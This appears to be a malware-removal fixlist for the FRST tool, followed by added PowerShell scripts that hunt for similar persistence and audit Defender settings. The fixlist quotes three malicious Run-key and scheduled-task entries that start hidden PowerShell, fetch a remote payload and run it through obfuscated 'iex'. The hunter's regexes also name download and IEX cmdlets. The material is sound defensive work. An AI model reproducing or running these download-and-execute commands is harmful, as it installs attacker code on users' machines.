Start::
CreateRestorePoint:
CloseProcesses:
HKU\S-1-5-21-1884956365-3338842099-1994139295-1003\...\Run: [Windows PowerShell v1.0] => powershell.exe -NoProfile -ExecutionPolicy Bypass -WindowStyle Hidden -Command "sal psv1 powershell.exe; .(gal ?rm) 79.8141710/task | .('ROGieROGx'.Replace('ROG', ''))" (No File) <==== ATTENTION
Task: {F1F8F464-E4A7-4ED4-829A-BF02ED04CE78} - System32\Tasks\GoogleSystem\GoogleUpdater\GoogleUpdaterTaskSystem47.0.7703.3{47263A17-2D66-43B9-9692-30514D0C1AEC} => C:\WINDOWS\system32\conhost.exe [1003520 2026-03-11] (Microsoft Windows -> Microsoft Corporation) -> --headless %SystemRoot%\System32\WindowsPowerShell\v1.0\powershell.exe -NoP -ExecutionPolicy Bypass -WindowStyle Hidden -Command "sal psv1 C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe; .(gal ?rm) 79.8141710/task | .('ROGieROGx'.Replace('ROG', ''))}" <==== ATTENTION
Task: {D93FB2F3-0520-49B4-8C8D-F8450C322685} - System32\Tasks\Windows Perflog => C:\WINDOWS\system32\conhost.exe [1003520 2026-03-11] (Microsoft Windows -> Microsoft Corporation) -> --headless powershell.exe -NoProfile -ExecutionPolicy Bypass -WindowStyle Hidden -Command "sal psv1 $env:SystemRoot\System32\WindowsPowerShell\v1.0\powershell.exe; .(gal ?rm) 79.8141710/task | .('ROGieROGx'.Replace('ROG', ''))" <==== ATTENTION
2026-03-30 15:52 - 2024-04-07 18:13 - 000000000 ____D C:\Users\matyi\AppData\Roaming\RenPy
Task: {077BA067-7C15-40F0-B22E-C9DC2A54B4A2} - System32\Tasks\Microsoft\Windows\Location\Notifications => %windir%\System32\LocationNotificationWindows.exe (No File)
Task: {F3E6E7ED-A196-4E44-8803-55FAB3AD4E29} - System32\Tasks\Microsoft\Windows\UpdateOrchestrator\USO_UxBroker => %systemroot%\system32\MusNotification.exe (No File)
S4 NvModuleTracker; \SystemRoot\System32\DriverStore\FileRepository\nvmoduletracker.inf_amd64_ea6cec41fc5b2a8b\NvModuleTracker.sys [X]
Task: {2C94177E-C279-4BCB-88AF-ACBA05968AB0} - System32\Tasks\IsSingleByte => C:\Users\matyi\AppData\Roaming\DisallowCodeDownload\IsSingleByte.exe [1779200 2026-02-18] (BC<?H8=8;I:B@D2D=>7@;3A>) [File not signed] <==== ATTENTION
Task: {960CFAA4-E369-4C79-B86B-DE8FACF55A08} - System32\Tasks\Telegram => C:\Users\matyi\AppData\Roaming\Telegram\Telegram.exe [2275328 2026-03-28] (:;7=>64495>I=86IE@7H) [File not signed] <==== ATTENTION
(:;7=>64495>I=86IE@7H) [File not signed] C:\Users\matyi\AppData\Roaming\Telegram\Telegram.exe
(svchost.exe ->) (BC<?H8=8;I:B@D2D=>7@;3A>) [File not signed] C:\Users\matyi\AppData\Roaming\DisallowCodeDownload\IsSingleByte.exe
HKU\S-1-5-21-1884956365-3338842099-1994139295-1003\...\Run: [data] => C:\Users\matyi\AppData\Local\data\data.exe [1222656 2026-03-11] (I7F<I;5A4@5HHFE@D@?JAJ5) [File not signed]
Task: {50E1AED0-E4EC-4232-874B-5672B9D8AE5B} - System32\Tasks\TargetSite => C:\Users\matyi\AppData\Local\AsUi1\ndlhiaarf\TargetSite.exe [325632 2026-02-16] () [File not signed]
2026-04-03 08:49 - 2026-04-03 08:49 - 000000000 ____D C:\ProgramData\Kujacuturi
2026-04-02 15:02 - 2026-04-02 15:02 - 000000000 ____D C:\Users\matyi\AppData\Roaming\Ribatiqoh
2026-04-01 16:50 - 2026-04-02 16:03 - 000000000 ____D C:\Users\matyi\AppData\Roaming\Petroglyph
2026-03-31 15:45 - 2026-03-31 15:45 - 000000000 ____D C:\Users\matyi\AppData\Roaming\Podekes
2026-03-28 12:51 - 2026-03-28 12:51 - 000000000 ___HD C:\Users\matyi\AppData\Roaming\Telegram
2026-03-11 20:58 - 2026-03-11 20:58 - 000000000 ____D C:\Users\matyi\AppData\Local\data
2026-03-31 15:45 - 2026-03-31 15:45 - 000000000 ____D C:\ProgramData\Tadih
2026-01-17 16:20 - 2025-12-29 20:30 - 000000109 _____ () C:\ProgramData\music.vbs
2026-02-16 16:37 - 2026-02-16 16:37 - 000325632 _____ () C:\ProgramData\music.exe
2024-05-01 13:15 - 2024-05-18 08:54 - 000012288 _____ () C:\Users\matyi\AppData\Roaming\emp.bin
C:\Users\matyi\AppData\Local\AsUi1
C:\Users\matyi\AppData\Roaming\DisallowCodeDownload
StartPowershell:
# Enumerate every Defender exclusion (path, extension, process) and remove it, so nothing
# the malware whitelisted stays out of scope for the signature update and scan below.
Try {
    $Paths      = (Get-MpPreference).ExclusionPath
    $Extensions = (Get-MpPreference).ExclusionExtension
    $Processes  = (Get-MpPreference).ExclusionProcess
    foreach ($Path in $Paths) {
        Remove-MpPreference -ExclusionPath $Path -Force -ErrorAction Stop
    }
    foreach ($Extension in $Extensions) {
        Remove-MpPreference -ExclusionExtension $Extension -Force -ErrorAction Stop
    }
    foreach ($Process in $Processes) {
        Remove-MpPreference -ExclusionProcess $Process -Force -ErrorAction Stop
    }
}
Catch {
    Write-Error "Error occurred while removing Windows Defender exclusions: $_"
}
EndPowershell:
cmd: powershell -nop -c "Update-MpSignature"
cmd: powershell -nop -c "Start-MpScan -ScanType QuickScan"
# This snippet changes the Windows Defender settings to ensure stricter malware protection
cmd: powershell -nop -c "Set-MpPreference -CheckForSignaturesBeforeRunningScan 1"
cmd: powershell -nop -c "Set-MpPreference -CloudBlockLevel 2"
cmd: powershell -nop -c "Set-MpPreference -DisableArchiveScanning 0"
cmd: powershell -nop -c "Set-MpPreference -DisableAutoExclusions 1"
cmd: powershell -nop -c "Set-MpPreference -DisableBehaviorMonitoring 0"
cmd: powershell -nop -c "Set-MpPreference -DisableIOAVProtection 0"
cmd: powershell -nop -c "Set-MpPreference -DisableRealtimeMonitoring 0"
cmd: powershell -nop -c "Set-MpPreference -DisableRemovableDriveScanning 0"
cmd: powershell -nop -c "Set-MpPreference -DisableScriptScanning 0"
cmd: powershell -nop -c "Set-MpPreference -EnableNetworkProtection Enabled"
cmd: powershell -nop -c "Set-MpPreference -MAPSReporting 2"
cmd: powershell -nop -c "Set-MpPreference -PUAProtection 1"
cmd: powershell -nop -c "Set-MpPreference -SubmitSamplesConsent 1"
cmd: powershell -nop -c "Set-MpPreference -DisableBlockAtFirstSeen 0"
cmd: powershell -nop -c "Set-MpPreference -DisableScanningNetworkFiles 0"
cmd: powershell -nop -c "Set-MpPreference -DisableScanningMappedNetworkDrivesForFullScan 0"
cmd: powershell -nop -c "Set-MpPreference -DisableHeuristics 0"
cmd: powershell -nop -c "Set-MpPreference -DisableEmailScanning 0"
cmd: powershell -nop -c "Update-MpSignature"
StartPowerShell:
# Downloads the newest AdwCleaner build directly from Malwarebytes, updates it, scans, cleans and prints the log to the console
# Does not clean preinstalled objects, only PUP/adware
# To also remove preinstalled objects, append /preinstalled after the /clean argument
# To scan only, without cleaning, change /clean to /scan
New-Item -ItemType Directory -Force -Path "$env:SystemDrive\AdwCleaner" | Out-Null
Invoke-WebRequest -Uri "https://adwcleaner.malwarebytes.com/adwcleaner?channel=release" -OutFile "$env:SystemDrive\AdwCleaner\AdwCleanerFRST.exe"
Start-Process -FilePath "$env:SystemDrive\AdwCleaner\AdwCleanerFRST.exe" -ArgumentList "/eula" -Wait -WindowStyle Hidden
$logFile = "$env:SystemDrive\AdwCleaner\AdwCleanerOutputFRST.txt"
Start-Process -FilePath "$env:SystemDrive\AdwCleaner\AdwCleanerFRST.exe" -ArgumentList "/noreboot /clean" -Wait -WindowStyle Hidden -RedirectStandardOutput $logFile
Get-Content $logFile -Encoding Unicode
Remove-Item -Path $logFile -Force -ErrorAction SilentlyContinue
EndPowerShell:
EmptyTemp:
End::
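The three entries marked ATTENTION above share one launch pattern: conhost.exe --headless starting powershell.exe with -ExecutionPolicy Bypass and -WindowStyle Hidden, a command that never spells out the cmdlets it uses (the alias table is queried with a wildcard, gal ?rm, and the second cmdlet name is assembled with .Replace()), and a remote path fetched on every run. The script below is an added example, not part of the fixlist and not code from FRST or from the helper who wrote the fix. It walks every scheduled task action and every Run value in the machine hives and the loaded user hives, scores each command line against indicator regexes derived from those entries, and lists anything matching two or more. It only reports; it removes nothing. The indicator list and the EXAMPLE-HOST placeholder in the self-check are assumptions. Run it elevated in a separate PowerShell session after the fix, never inside the fixlist.

```powershell
# Added example (not part of the fixlist): read-only hunt for persistence shaped like the
# entries marked ATTENTION above. Run elevated in its own PowerShell session.

# Indicator regexes derived from the flagged entries (assumption: tune them for your estate).
# The flagged command lines never contain a literal download or IEX cmdlet name: one is
# resolved through the alias table (gal ?rm), the other built with .Replace(), so the
# alias-lookup and string-building patterns matter more than the cmdlet names do.
$Indicators = [ordered]@{
    'conhost --headless launcher'      = 'conhost(\.exe)?\s+--headless'
    'execution policy bypass'          = '-(ExecutionPolicy|ep|ex)\s+Bypass'
    'hidden window'                    = '-(WindowStyle|w)\s+Hidden'
    'alias lookup (gal/sal)'           = '\b(gal|sal|Get-Alias|Set-Alias)\b'
    'string-built command name'        = "\.Replace\('"
    'literal download/IEX cmdlet'      = '\b(iex|irm|iwr|Invoke-Expression|Invoke-RestMethod|Invoke-WebRequest)\b'
    'binary under AppData/ProgramData' = '\\(AppData|ProgramData)\\[^"\s]*\.exe'
}

function Test-SuspiciousCommandLine {
    param([Parameter(Mandatory)][AllowEmptyString()][string] $CommandLine)
    # Names of every indicator that matches; an empty array means nothing matched.
    $hits = @(foreach ($name in $Indicators.Keys) {
        if ($CommandLine -match $Indicators[$name]) { $name }
    })
    return ,$hits
}

function Get-PersistenceCandidates {
    # Scheduled tasks: program plus arguments of each exec action, as one command line.
    foreach ($task in Get-ScheduledTask -ErrorAction SilentlyContinue) {
        foreach ($action in $task.Actions) {
            if (-not $action.Execute) { continue }   # skip COM-handler actions
            [pscustomobject]@{
                Source      = "Task: $($task.TaskPath)$($task.TaskName)"
                CommandLine = ("$($action.Execute) $($action.Arguments)").Trim()
            }
        }
    }
    # Run values: machine-wide keys plus every loaded user hive under HKEY_USERS.
    $runKeys = @(
        'HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run',
        'HKLM:\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run'
    )
    if (-not (Get-PSDrive -Name HKU -ErrorAction SilentlyContinue)) {
        New-PSDrive -Name HKU -PSProvider Registry -Root HKEY_USERS | Out-Null
    }
    $runKeys += @(Get-ChildItem 'HKU:\' -ErrorAction SilentlyContinue |
        ForEach-Object { "$($_.PSPath)\Software\Microsoft\Windows\CurrentVersion\Run" })
    $meta = 'PSPath', 'PSParentPath', 'PSChildName', 'PSDrive', 'PSProvider'
    foreach ($key in $runKeys) {
        if (-not $key) { continue }
        $values = Get-ItemProperty -Path $key -ErrorAction SilentlyContinue
        if (-not $values) { continue }
        foreach ($v in $values.PSObject.Properties | Where-Object { $_.Name -notin $meta }) {
            [pscustomobject]@{ Source = "Run: $key [$($v.Name)]"; CommandLine = [string]$v.Value }
        }
    }
}

# Self-check on a constructed command line shaped like the flagged entries (EXAMPLE-HOST is
# a placeholder, not a real endpoint): five indicators fire, and the literal-cmdlet pattern
# stays silent, which is exactly the evasion the flagged entries rely on.
$sample = 'C:\WINDOWS\system32\conhost.exe --headless powershell.exe -NoP -ExecutionPolicy Bypass -WindowStyle Hidden -Command "sal psv1 powershell.exe; .(gal ?rm) EXAMPLE-HOST/task | .(''ROGieROGx''.Replace(''ROG'', ''''))"'
"Self-check indicators: $((Test-SuspiciousCommandLine $sample) -join '; ')"

# Live hunt: anything matching two or more indicators, strongest first.
Get-PersistenceCandidates |
    ForEach-Object {
        $hits = Test-SuspiciousCommandLine $_.CommandLine
        if ($hits.Count -ge 2) {
            [pscustomobject]@{
                Score       = $hits.Count
                Source      = $_.Source
                Indicators  = $hits -join '; '
                CommandLine = $_.CommandLine
            }
        }
    } |
    Sort-Object Score -Descending | Format-List
```

Legitimate software does occasionally use -ExecutionPolicy Bypass or a hidden window, which is why a single indicator is not reported; the combination of a conhost --headless launcher, alias tricks and a binary living under AppData is what makes the flagged entries stand out.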
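After the fixlist has run, the Set-MpPreference lines in it can be checked rather than trusted. The script below is an added example, not part of the fixlist and not FRST's or the helper's code: it reads Get-MpPreference once, compares each setting against a baseline table that mirrors the fixlist's Set-MpPreference block (the table is an assumption to adjust to your own policy; DisableHeuristics is left out because it is not confirmed here as a readable Get-MpPreference property), lists any exclusions that survived the removal loop, and cross-checks the engine state with Get-MpComputerStatus. Run it elevated in a separate PowerShell session.

```powershell
# Added example (not part of the fixlist): verify Microsoft Defender settings after the fix.
# Requires an elevated session; Get-MpPreference / Get-MpComputerStatus ship with Windows.

# Expected values, mirroring the fixlist's Set-MpPreference lines. The object returned by
# Get-MpPreference exposes these settings as properties with the same names.
# (Assumption: adjust the table to your own baseline.)
$Baseline = @{
    CheckForSignaturesBeforeRunningScan           = 1
    CloudBlockLevel                               = 2   # High
    DisableArchiveScanning                        = 0
    DisableAutoExclusions                         = 1
    DisableBehaviorMonitoring                     = 0
    DisableIOAVProtection                         = 0
    DisableRealtimeMonitoring                     = 0
    DisableRemovableDriveScanning                 = 0
    DisableScriptScanning                         = 0
    EnableNetworkProtection                       = 1   # Enabled (2 would be audit mode)
    MAPSReporting                                 = 2   # Advanced
    PUAProtection                                 = 1   # Enabled
    SubmitSamplesConsent                          = 1   # SendSafeSamples
    DisableBlockAtFirstSeen                       = 0
    DisableScanningNetworkFiles                   = 0
    DisableScanningMappedNetworkDrivesForFullScan = 0
    DisableEmailScanning                          = 0
}

function Test-DefenderBaseline {
    param(
        [Parameter(Mandatory)] $Preference,            # output of Get-MpPreference
        [Parameter(Mandatory)] [hashtable] $Expected
    )
    # One row per setting that is missing or differs from the baseline. Booleans and the
    # numeric enum-style settings both compare correctly once cast to [int].
    $drift = @(foreach ($name in ($Expected.Keys | Sort-Object)) {
        $actual = $Preference.$name
        if ($null -eq $actual -or [int]$actual -ne [int]$Expected[$name]) {
            [pscustomobject]@{ Setting = $name; Expected = $Expected[$name]; Actual = $actual }
        }
    })
    return ,$drift
}

function Get-DefenderExclusions {
    param([Parameter(Mandatory)] $Preference)
    # Anything still excluded after the removal loop deserves a look: malware routinely
    # excludes its own folder, extension or process from real-time scanning.
    [pscustomobject]@{
        Paths      = @(@($Preference.ExclusionPath)      | Where-Object { $_ })
        Extensions = @(@($Preference.ExclusionExtension) | Where-Object { $_ })
        Processes  = @(@($Preference.ExclusionProcess)   | Where-Object { $_ })
    }
}

$pref  = Get-MpPreference
$drift = Test-DefenderBaseline -Preference $pref -Expected $Baseline
if ($drift.Count -eq 0) {
    'All audited Defender settings match the hardened baseline.'
} else {
    'Settings that deviate from the baseline:'
    $drift | Format-Table -AutoSize
}

$excl = Get-DefenderExclusions -Preference $pref
"Remaining exclusions: $($excl.Paths.Count) path(s), $($excl.Extensions.Count) extension(s), $($excl.Processes.Count) process(es)"
$excl | Format-List

# The preferences say what should happen; the status object says what the engine is doing.
Get-MpComputerStatus |
    Select-Object AMServiceEnabled, RealTimeProtectionEnabled, BehaviorMonitorEnabled,
                  IoavProtectionEnabled, AntivirusSignatureLastUpdated
```

A setting that keeps drifting back after the fix, or an exclusion that reappears, is a sign that something still running on the host is re-applying its configuration, which is worth knowing before the machine is declared clean.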